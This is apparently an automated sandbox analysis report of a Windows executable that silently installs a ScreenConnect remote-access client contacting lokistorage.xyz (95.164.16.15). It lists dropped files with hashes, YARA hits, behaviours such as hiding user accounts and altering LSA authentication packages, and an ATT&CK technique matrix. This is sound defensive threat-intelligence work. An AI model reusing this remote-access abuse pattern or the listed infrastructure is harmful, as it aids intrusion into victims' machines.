                              Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_05853540 CreateNamedPipeW,8_2_05853540
                              Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exeCode function: 8_2_01514D30 RtlGetVersion,8_2_01514D30
                              Source: C:\Users\user\Desktop\tmpzNIZ0YQ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: tmpzNIZ0YQ.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.2.tmpzNIZ0YQ.exe.5ef0000.9.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.236fa10.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.2.tmpzNIZ0YQ.exe.5ef0000.9.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.d0000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.tmpzNIZ0YQ.exe.ce518c.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.tmpzNIZ0YQ.exe.c363d4.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.tmpzNIZ0YQ.exe.cbb9d4.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.2abfa50.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0.0.tmpzNIZ0YQ.exe.c20000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000002.1418481996.0000000005EF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000000.1491349532.00000000000D2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000009.00000002.2661733750.00000000022F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000000.1395919475.0000000000C36000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.1544940596.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000000.00000002.1410867618.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: tmpzNIZ0YQ.exe PID: 7392, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7920, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 8040, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\418a04.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI8E59.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Component Object Model Hijacking
                              1
                              Component Object Model Hijacking
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items13
                              Process Injection
                              1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554619 Sample: tmpzNIZ0YQ.exe Startdate: 12/11/2024 Architecture: WINDOWS Score: 50 55 lokistorage.xyz 2->55 61 Multi AV Scanner detection for submitted file 2->61 63 .NET source code contains potential unpacker 2->63 65 .NET source code references suspicious native API functions 2->65 69 5 other signatures 2->69 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 tmpzNIZ0YQ.exe 5 2->15         started        signatures3 67 Performs DNS queries to domains with low reputation 55->67 process4 dnsIp5 35 ScreenConnect.Wind...dentialProvider.dll, PE32+ 8->35 dropped 37 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.ClientService.exe, PE32 8->39 dropped 43 10 other files (1 malicious) 8->43 dropped 75 Enables network access during safeboot for specific services 8->75 77 Modifies security policies related information 8->77 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 lokistorage.xyz 95.164.16.15, 49708, 8041 NASSIST-ASGI Gibraltar 12->57 79 Reads the Security eventlog 12->79 81 Reads the System eventlog 12->81 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\...\tmpzNIZ0YQ.exe.log, ASCII 15->41 dropped 83 Contains functionality to hide user accounts 15->83 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 20 17->31         started        71 Creates files in the system32 config directory 23->71 73 Contains functionality to hide user accounts 23->73 45 C:\Users\user\AppData\Local\...\MSI7FE2.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              tmpzNIZ0YQ.exe21%ReversingLabsWin32.PUA.ConnectWise
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSI9148.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI934C.tmp0%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              lokistorage.xyz
                              95.164.16.15
                              truetrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drfalse
                                  high
                                  http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drfalse
                                    high
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000008.00000002.2662716124.0000000001E0F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002EC6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.drfalse
                                        high
                                        https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                          high
                                          https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                            high
                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs
                                            IPDomainCountryFlagASNASN NameMalicious
                                            95.164.16.15
                                            lokistorage.xyzGibraltar
                                            29632NASSIST-ASGItrue
                                            Joe Sandbox version:41.0.0 Charoite
                                            Analysis ID:1554619
                                            Start date and time:2024-11-12 18:39:16 +01:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 8m 29s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:17
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:tmpzNIZ0YQ.exe
                                            renamed because original name is a hash value
                                            Original Sample Name:29e369f7b7ee09c8b15a8dc133561d4d71e55c100eeff8d7e72d2c6016b179e9.exe
                                            Detection:MAL
                                            Classification:mal50.troj.evad.winEXE@17/65@1/1
                                            EGA Information:
                                            • Successful, ratio: 60%
                                            HCA Information:
                                            • Successful, ratio: 65%
                                            • Number of executed functions: 318
                                            • Number of non-executed functions: 3
                                            Cookbook Comments:
                                            • Found application associated with file extension: .exe
                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target rundll32.exe, PID 7656 because it is empty
                                            • Execution Graph export aborted for target tmpzNIZ0YQ.exe, PID 7392 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                            • VT rate limit hit for: tmpzNIZ0YQ.exe
                                            No simulations
                                            No context
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            NASSIST-ASGIJosho.m68k.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            J5uGzpvcAa.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            nPRmTlXhOT.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            OwBugJ5CiC.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            H5LPetzgXV.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            4l9YKCc7qQ.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            mCR2IJsjgy.elfGet hashmaliciousUnknownBrowse
                                            • 95.164.4.65
                                            Josho.arm7.elfGet hashmaliciousMiraiBrowse
                                            • 95.164.4.65
                                            J3m5xLlT8D.exeGet hashmaliciousDCRatBrowse
                                            • 95.164.6.175
                                            na.elfGet hashmaliciousUnknownBrowse
                                            • 94.131.118.154
                                            No context
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dllLatest version 4.7.exeGet hashmaliciousScreenConnect ToolBrowse
                                              Latest version 4.7.exeGet hashmaliciousScreenConnect ToolBrowse
                                                INSPECAO-B01S.msiGet hashmaliciousScreenConnect ToolBrowse
                                                  1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    1.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      5iT2ITz44g.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        5iT2ITz44g.exeGet hashmaliciousScreenConnect ToolBrowse
                                                          E-receipt-67.exeGet hashmaliciousScreenConnect ToolBrowse
                                                            E-receipt-67.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              statment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):219640
                                                                Entropy (8bit):6.581196702368715
                                                                Encrypted:false
                                                                SSDEEP:3072:R09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGi:R0uH2aCGw1ST1wQLdqvi
                                                                MD5:0639C046D5333077269FA82C5140536E
                                                                SHA1:C227741CACAA33B6A048C5008E7AB3E03B7FF23B
                                                                SHA-256:1AD9020677AD3407199352A1D7CE2B5F6F7032A5CDB31BA6AF8167F21D94FCDC
                                                                SHA-512:8F6E78EB8E7DE9B6452C46C044E3800007AF7C1910177101ED424A1ACA020191A98C604DED5795E7A9DBFED5B0E3A3AEF6DC5FE42DDA70317ECC0496E07E22D5
                                                                Malicious:false
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\418a04.rbs, Author: Joe Security
                                                                Reputation:low
                                                                Preview:...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{6E5988BE-3FE4-2081-9090-28726FA53B07}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{AAFCFDA6-3A31-9AA2-04B7-C6C55684F80B}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{7BEC3624-40B7-0ABF-4C6B-0093902CAEA0}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@....
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):241
                                                                Entropy (8bit):4.920230500734458
                                                                Encrypted:false
                                                                SSDEEP:6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsiMI4CAcO:rHy2DLI4MWoj12K9cAuiMI4L
                                                                MD5:E412586907C81C15CED17A120DE270B3
                                                                SHA1:EE0E2EDE15DAD65285184C2044367CC6D20D8709
                                                                SHA-256:0F0E577CD0071C73AFB57530C67C5C79E3A0695FBA617ED5531B882AAB0531EB
                                                                SHA-512:CFB7699A72B393B06B89C197F378EBC31650E0D9B96966F1464BA79E6EF92B6EE9D951D588E47250E9A523869E0E9FDE592E237168B429F430C1A11EE2F8045B
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......Signature Bank
                                                                Process:C:\Windows\System32\msiexec.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):169094
                                                                Entropy (8bit):7.97364017646364
                                                                Encrypted:false
                                                                SSDEEP:3072:Q1BQsAtdZEVwx9whh71/ccEOCnJ8GEsuMNSWID4ygf8AuSJpKeza:QHQ96VwPYhx/cc9mJnEsu81Ln/Jwt
                                                                MD5:DE75320C1124233901AA23C368595375
                                                                SHA1:23A40D4AA2F1D71F819581F0EA9FEADA5ED234DA
                                                                SHA-256:32EA2F66A6C8F4345C4AFF82465A5BB81588743CE8CBB25F6D4BEE90E28A00DB
                                                                SHA-512:5FDC124BF5D9C30D13019D4326C91BD5FEEAF46F337C14F87A50E468B0AB8737F34180E8A4CE7B005B761B82ED100812E3B4C5C786AA21F3B8270733A462724B
                                                                Malicious:false
                                                                Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....H.....;...H...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.8... 3....PNG........IHDR.......8........C....sBIT....|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<... .IDATx.....(.....'.....q..R. ...L.7.c..$H"..........A...d.k^.r.............u.....r$.......<..8.....O.....{..Xi6....F....P.........N,..I|1..%7.v......X.n..r..5........H..4.GK.~?.9.@K/.+....s=.4Y..-~...;ge..E_Htd..C..../..!.'o...n.6.....jiG`G.~.v........4YJ<g.g...s.....k$...ki{.)..8....AX.X.-..(...f.'..H...5.....|.O....t........p.K....x..y......d.$nx........1...z...U./..:j...u..^..oz..^K.[.-!.........t..m.t..$O........H....h..$..(....;V....t..B.u.f...K...HHS.y....~,.U:Q...D|.....,v..x..n.7..>x".H.z.p..5.:WR>..46.&..4....u..
                                                                Process:C:\Windows\System32\msiexec.exe
